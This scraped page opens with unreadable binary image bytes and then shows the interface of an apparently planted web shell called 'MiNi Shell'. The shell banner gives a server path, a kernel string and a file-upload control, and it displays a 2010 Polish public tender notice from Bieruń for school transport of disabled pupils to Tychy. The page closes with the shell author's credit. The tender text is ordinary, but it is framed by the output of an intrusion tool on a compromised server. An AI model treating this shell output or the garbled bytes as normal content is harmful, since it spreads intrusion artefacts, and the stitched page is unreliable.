JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100720/216322-N-2010.html

<p class="kh_header"><b>Bieruń: Przewóz osób niepełnosprawnych - uczniów, dzieci i młodzieży do specjalistycznych placówek nauczania: zadanie 2: na trasie Bieruń - Tychy</b><br>
<b>Numer ogłoszenia: 216322 - 2010; data zamieszczenia: 20.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz osób niepełnosprawnych - uczniów, dzieci i młodzieży do specjalistycznych placówek nauczania: zadanie 2: na trasie Bieruń - Tychy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przewóz na trasie BIERUŃ STARY - TYCHY
osób niepełnosprawnych - uczniów (dzieci oraz młodzieży), do specjalistycznych placówek nauczania, zlokalizowanych na terenie gminy Tychy.	
Szacunkowa ilość przewożonych osób  - 16  ( osoby niepełnosprawne z różnym stopniem upośledzenia, z atakami padaczki włącznie w tym  na wózku inwalidzkim + opiekun ogólny + opiekunowie indywidualni).
Zadanie wykonać należy 4 kursami,   (2 kursy robocze , 1 powrotny i 1 dojazdowy ) . Jedna para kursów wykonywana jest w godzinach rannych i jedna w godzinach popołudniowych .
Przewóz osób musi być realizowany pojazdem: wyprodukowanym nie wcześniej niż w roku 1998
i posiadać minimum 18 miejsc siedzących,  wyposażonych w pasy bezpieczeństwa dla pasażerów.
Pojazd winien zapewniać swobodne, bezpieczne i szybkie zajęcie miejsca, osobom niepełnosprawnym. W związku z powyższym musi być wyposażony w jedno z n/w urządzeń:
         -nisko osiadającą podłogę
        - specjalistyczny podnośnik
        - najazd pochyły.
We wnętrzu pojazdu, zainstalowany być musi odpowiedni osprzęt, zapewniający możliwość stabilnego zakotwienia przewożonych wózków inwalidzkich. . 
Okres realizacji usługi: 1.09.2010 r. do 30.06.2011 r. (w dni nauki).
W ramach wykonywanego zamówienia, Wykonawca zobowiązany jest do zapewnienia opiekuna, sprawującego opiekę/nadzór nad wszystkimi osobami  przewożonymi do placówek nauczania.   
Opiekun ogólny musi posiadać kwalifikacje do wykonywania zawodu pielęgniarki lub ukończony kurs udzielania pierwszej pomocy , lub udokumentowane min. sześciomiesięczne doświadczenie w opiece nad osobami niepełnosprawnymi.
Zadaniem opiekuna jest udzielanie czynnej pomocy osobom niepełnosprawnym w bezpiecznym zajęciu miejsca w pojeździe, opieki podczas trwania  podróży oraz przy opuszczaniu pojazdu po jej zakończeniu.                        
W sposób szczególny traktowane być muszą osoby niepełnosprawne, korzystające z wózka inwalidzkiego.
Osobom niepełnosprawnym o dużym stopniu upośledzenia, dodatkową opiekę w czasie podróży zapewniają rodzice lub osoby przez nich upoważnione. 
Przewóz odbywać się będzie w godzinach 7:00 - 8:30, 14:30 - 16:00.
Szczegółowy rozkład jazdy oraz miejsca zbiórki, Zamawiający przekaże Wykonawcy przed realizacją umowy.
Szacunkowy przebieg w czasie trwania umowy określa się na -  21 120,00km.
Ilość ta może podlegać korekcie (w dół lub w górę),  jeśli w trakcie roku szkolnego pojawi się konieczność dowozu nowo zakwalifikowanych osób lub też nastąpi przypadek rezygnacji z przedmiotowego przewozu.
Rzeczywisty przebieg (w km) będzie podlegać rozliczeniu w skali miesięcznej.
Zamawiający w trakcie trwania umowy, przewiduje wyposażenie pojazdów przewożących osoby niepełnosprawne w nadajniki GPS, umożliwiające bieżącą kontrolę wykonywanego przewozu. 
Uzupełnienie opisu przedmiotu zamówienia zawiera wzór umowy.
Zamawiający nie przewiduje: zaliczek na poczet wykonania zamówienia, udzielenia zamówień uzupełniających, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów w rozumieniu ustawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli       przepisy prawa nakładają obowiązek ich posiadania tj. posiadają licencję na wykonywanie krajowego transportu drogowego osób.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie:
- oświadczenia  z art. 22 ust.1 pkt. 1 ustawy 
- dokumentu - licencji na  wykonywanie krajowego transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie :
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie:
  -oświadczenia z art. 22 ust.1 pkt. 2 ustawy .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. 
         Dysponują pojazdem,  którym będą  realizowane przewozy,  spełniającym poniższe  
         wymagania:
         - rok produkcji nie wcześniejszy niż 1998,
         -  minimum 18 miejsc siedzących,  wyposażonych w pasy bezpieczeństwa dla pasażerów,
         -  wyposażony w jedno z urządzeń: nisko osiadającą podłogę lub specjalistyczny podnośnik
            lub najazd pochyły,
        -  zainstalowany  we wnętrzu pojazdu osprzęt, zapewniający możliwość stabilnego  
           zakotwienia przewożonych wózków inwalidzkich. . 

Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie :
- oświadczenia (art. 22 ust.1 pkt.3 ustawy);
- opisu  pojazdu, którym będzie wykonywana usługa, z uwzględnieniem minimalnych 
   wymogów wskazanych przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.

Dysponują osobą, która będzie pełniła opiekę nad wszystkimi przewożonymi do placówek  nauczania osobami, posiadającą kwalifikacje do wykonywania zawodu pielęgniarki lub ukończony kurs udzielania pierwszej pomocy, lub udokumentowane min. sześciomiesięczne doświadczenie w opiece nad osobami niepełnosprawnymi .
  
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie :
- oświadczenia (art. 22 ust.1 pkt.3 ustawy)
- dokumentu - wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia z   
   informacją na temat ich kwalifikacji zawodowych oraz podstawie do dysponowania tymi  
    osobami   .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia :
         
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie:       - oświadczenia (art. 22 ust.1 pkt.4 ustawy) .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każdy Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
      1.  Oferta jest jawna w całości / części. Strony oferty od -  do stanowią tajemnicę          
           przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą 
   być ujawnione innym uczestnikom postępowania.
   W przypadku braku złożenia oświadczenia Zamawiający uzna, że oferta Wykonawcy jest 
   jawna w całości.

2.   Oświadczenie, czy część zamówienia zostanie powierzona podwykonawcom.

 3. Oświadczenie podmiotów występujących wspólnie (konsorcjum, spółka cywilna) -                    w przypadku ich udziału w postępowaniu.

         4. Oświadczenie osoby/ osób podpisujących ofertę, że jest / są uprawniona/ -e do zaciągania 
zobowiązań i składania oświadczeń w imieniu Wykonawcy.
        
        5.  Oświadczenie o zapoznaniu się z treścią SIWZ i jej akceptacji oraz terminie związania  
             ofertą.

     6. Oświadczenie o upoważnieniu do składania oświadczeń oraz zaciąganiu zobowiązań w 
         imieniu wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z Wykonawcą umowy w zakresie:
a) terminu realizacji , w szczególności spowodowane zmianami wynikającymi z 
     uregulowań  oświatowych, zmianą przepisów prawnych;
b) wartości zamówienia, w szczególności w przypadku zwiększonej ilości wykonanych km 
    związanych ze zmianą ilości dni pobytu w placówkach, miejscem zamieszkania  
    dowożonych osób , zmiany wysokości VAT;
     c) innych zmian , których nie można było przewidzieć na etapie sporządzania SIWZ, a które    
                 nie wykraczają poza zakres art. 140 Prawa zamówień publicznych .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2010 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter) 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com